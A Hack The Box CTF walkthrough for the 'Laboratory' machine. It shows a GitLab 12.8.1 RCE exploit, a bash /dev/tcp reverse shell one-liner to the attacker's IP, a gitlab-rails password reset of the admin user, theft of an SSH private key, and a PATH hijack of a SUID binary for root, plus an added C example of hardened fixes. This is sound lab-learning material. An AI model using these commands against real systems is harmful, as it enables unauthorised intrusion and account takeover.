# Hack The Box - Laboratory Walkthrough without Metasploit

![Laboratory](/files/-MYOOh0cMHlNJvC7Gi2w)

## Enumeration

Let's start by running nmapAutomator on our target:

```
nmapAutomator 10.10.10.216 All
```

Our basic scan returns the following:

![Nmap Scan](/files/-MYOgYXnHR15e6iaHWY9)

### Ports

We have the following ports open

#### 22

This is the SSH (Secure Shell) port. We might be able to use it later to log in if we find a valid username and password, or a valid private key.

#### 80

HTTP port that redirects to the HTTPS one (443). On the Nmap scan we can see that we have discovered **laboratory.htb** and a second DNS name, **git.laboratory.htb**; we add both to our /etc/hosts.

![/etc/hosts entry](/files/-MYOkVPy5N-4gn4IIban)

We can also discover the DNS name with **gobuster**:

```bash
gobuster dns -d laboratory.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 40
```

![Gobuster DNS fuzz](/files/-MYOk-ehoIANZA0HPFNg)

#### 443

This port is related to HTTPS, and it's the one we will access while trying to go to **<https://laboratory.htb>** so let's try to see if there's anything interesting:

![Web](/files/-MYOl4Qz1HQRwxQQz5u-)

After some enumeration on the web page we couldn't find much of interest, so let's go to **<https://git.laboratory.htb>**. Here we find a GitLab Community Edition instance running, and we can register.

### GitLab

![Trying to register a GitLab account](/files/-MYOloiv5Vk7g13AJLMI)

We must use the laboratory email domain in order to register successfully:

![Using the correct Email domain](/files/-MYOmQnUr0cM-EtK6OVW)

And once we click on Register we are in as our new user **evil**.

![Logged in Laboratory GitLab](/files/-MYOnPpFIIUbgojhJ_Mf)

Looking through the page we can enumerate the GitLab version quite easily: go to Help and it will appear:

![GitLab Version 12.8.1](/files/-MYOoO5Ux6Vi8_FSVb8V)

Searching for known vulnerabilities in this version we found this report on HackerOne:

{% embed url="<https://hackerone.com/reports/827052>" %}
Arbitrary file read via UploadsRewriter
{% endembed %}

That leads us to this git repository:

{% embed url="<https://github.com/dotPY-hax/gitlab_RCE>" %}
gitlab\_RCE
{% endembed %}

Let's clone the repository and inspect the Python code!

```bash
git clone https://github.com/dotPY-hax/gitlab_RCE
```

We have to modify the script since this GitLab restricts email domains, and we also change the port on which we will be listening:

![Script modification](/files/-MYOr4yL1aPmT1t9EFWX)

We prepare a netcat listener on port 9009:

```bash
nc -nvlp 9009
```

Now we can use the script:

```bash
python3 gitlab_rce.py https://git.laboratory.htb <our-ip>
```

We have to choose option 2 since we want RCE and our version is 12.8.1. The script will stop and ask us whether we already have a listener (how nice). We can also see what it is doing:

* Registering user hcbh4toQHD:IWTygssOAM
* Creating project by8giL18px
* Creating project qQfLhudoho
* Creating issue gggHd8VkFn for project by8giL18px
* Moving issue from by8giL18px to qQfLhudoho
* Grabbing file secrets.yml
* Deploying payload
* Delete user hcbh4toQHD

![Gitlab Rce](/files/-MYOvFWUFleAu5SXd26X)

The shell really is unstable: whenever we press Enter it drops:

![Unstable Shell](/files/-MYOuEBE6bNGLDpK8xXt)

As soon as we get in we start another listener, and the first command we type is another reverse shell to make it a bit more stable:

```bash
/bin/bash -c 'bash -i >& /dev/tcp/<Our-IP>/<Port> 0>&1'
```

![Reverse Shell](/files/-MYOuWi19PxvrdXAHqfT)

On our other shell we grab the incoming connection:

![Stable Reverse](/files/-MYOwMQMgLSKxSLOsQkQ)

We are in as the git user. Enumerating, we find out that we are inside a Docker container:

![.dockerenv](/files/-MYOwkEhMz9VdPEYoJj_)

## Privilege Escalation

### Gitlab-rails

We are inside a container and cannot escape yet, but we notice that we have **gitlab-rails** available (\~/**gitlab-rails**/working). Searching for gitlab-rails we found two interesting pages:

{% embed url="<https://forum.gitlab.com/t/how-do-i-change-my-profile-to-admin/35888>" %}

{% embed url="<https://stackoverflow.com/questions/47134290/how-to-change-email-address-via-gitlab-rails-avoid-email-reconfirmation>" %}

Both links explain how to look up or modify users with the gitlab-rails console.

First we set the environment to production:

```bash
gitlab-rails console -e production
```

![Production Environment](/files/-MYOzLEh-uFTvtAhKk_N)

Now we can find users by id; we load the first user into the variable user:

```ruby
user = User.find_by(id: 1)
```

![Dexter](/files/-MYOz_w8NI7LNlAg4pHj)

Let's modify the user a bit:

* user.password --> set a new password
* user.password\_confirmation --> confirm new password
* user.save! --> save new configuration

![New Dexter password](/files/-MYP-8NGWsa0qti5aA3s)

Let's try to log in GitLab with **dexter** and our new password **evilpass**

![Impersonating Dexter](/files/-MYP3FekYACYMeX8TBJF)

Once we are logged in we can see there are two repositories:

![Dexter Repositories](/files/-MYP3a4Ui8ybqfbTluYQ)

If we enter on **SecureDocker** project we will find an interesting folder:

![Dexter folder](/files/-MYP4AssV1CNiUWpb9Le)

Inside that folder there is an even more interesting one!

![SSH folder](/files/-MYP4R2y27bcJtPL9zw4)

Inside .ssh we have the id\_rsa key that will allow us to log in as Dexter.

![id\_rsa](/files/-MYP4jTOdr45zaD38Tlc)

We copy that id\_rsa into a file on our box and chmod 600 it in order to be able to use it with ssh to log in:

```bash
chmod 600 dexterssh
ssh -i dexterssh dexter@10.10.10.216
```

![In as Dexter](/files/-MYP5D07PZIlkoOASqvU)

At this point we can grab our user hash. Once we have it, let's enumerate and try to escalate privileges.

### Dexter Privilege Escalation

We get **suid3num.py** onto the box to see if there are binaries with SUID:

{% embed url="<https://github.com/Anon-Exploiter/SUID3NUM>" %}
Suid3num.py
{% endembed %}

Start a SimpleHTTPServer on our box:

```bash
python -m SimpleHTTPServer
```

On Laboratory shell as dexter grab the script and execute it:

```bash
# SimpleHTTPServer listens on port 8000 by default
wget <Our-IP>:8000/suid3num.py
chmod +x suid3num.py
python3 suid3num.py
```

![Getting Suid3num.py to the box](/files/-MYP8gtdTmJgWT7c5x41)

We can see there is a custom SUID binary:

![](/files/-MYP7MOZup4NOX8lB1-e)

Inspecting the binary with **ltrace**, we see it's setting uid and gid to 0 (**root**) and then calling chmod without its full path. We can hijack that to become root:

![chmod without full path as root](/files/-MYP9qjVFHYtkCnT3LNR)

#### Hijacking chmod

Since it's using chmod without the full path, the binary will look through all the directories in our **$PATH** variable and use the first chmod that it finds. Knowing that, we will prepend **/tmp/.folder** to our PATH, and there we will create a file called **chmod** containing **/bin/bash** and make it executable:

```bash
mkdir -p /tmp/.folder
cd /tmp/.folder
export PATH=/tmp/.folder:$PATH
echo "/bin/bash" > chmod
chmod +x chmod
```

![Hijacking chmod](/files/-MYPAiOGlLsyApRu0wFb)
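As an added example (not the source of the docker-security binary, which the page does not show), the following C reproduces the PATH walk that a bare `chmod` triggers in a privileged helper and sets it beside two hardened replacements; the fixed environment value and the temporary file names used in it are assumptions.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Models the lookup system()/execvp() perform for a bare command name: walk PATH
 * left to right and take the first entry holding an executable of that name.
 * Returns 1 and writes the resolved path into 'out', or 0 if nothing matched.
 * Whoever controls the earliest writable PATH entry decides what a privileged
 * caller ends up running, which is exactly the weakness of the SUID binary above. */
int first_in_path(const char *cmd, const char *path, char *out, size_t outlen) {
    const char *p = path;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        /* An empty entry ("::", leading or trailing ':') means the current directory. */
        int n = len ? snprintf(out, outlen, "%.*s/%s", (int)len, p, cmd)
                    : snprintf(out, outlen, "./%s", cmd);
        if (n > 0 && (size_t)n < outlen && access(out, X_OK) == 0) return 1;
        if (!end) return 0;
        p = end + 1;
    }
}

/* Preferred fix for a helper that only needs to change a file mode: call the
 * chmod(2) system call directly, so no child process, shell or PATH lookup is
 * involved at all. Returns 0 on success, -1 on failure. */
int chmod_syscall_fix(const char *target, mode_t mode) {
    return chmod(target, mode);
}

/* If spawning an external program is unavoidable: absolute path (execve never
 * consults PATH), a fixed environment instead of the inherited one, no shell,
 * and "--" so a target beginning with '-' cannot be parsed as an option.
 * Returns the child's exit status, or -1 if it could not be run. */
int chmod_exec_fix(const char *target, const char *mode) {
    char *const argv[] = { "/bin/chmod", "--", (char *)mode, (char *)target, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };  /* assumed safe value */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve("/bin/chmod", argv, envp);
        _exit(127);  /* only reached if execve failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```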

## Pwnd

If we execute the SUID binary now:

```bash
/usr/local/bin/docker-security
```

![We are root](/files/-MYPAua92KgJDOlQrf9-)
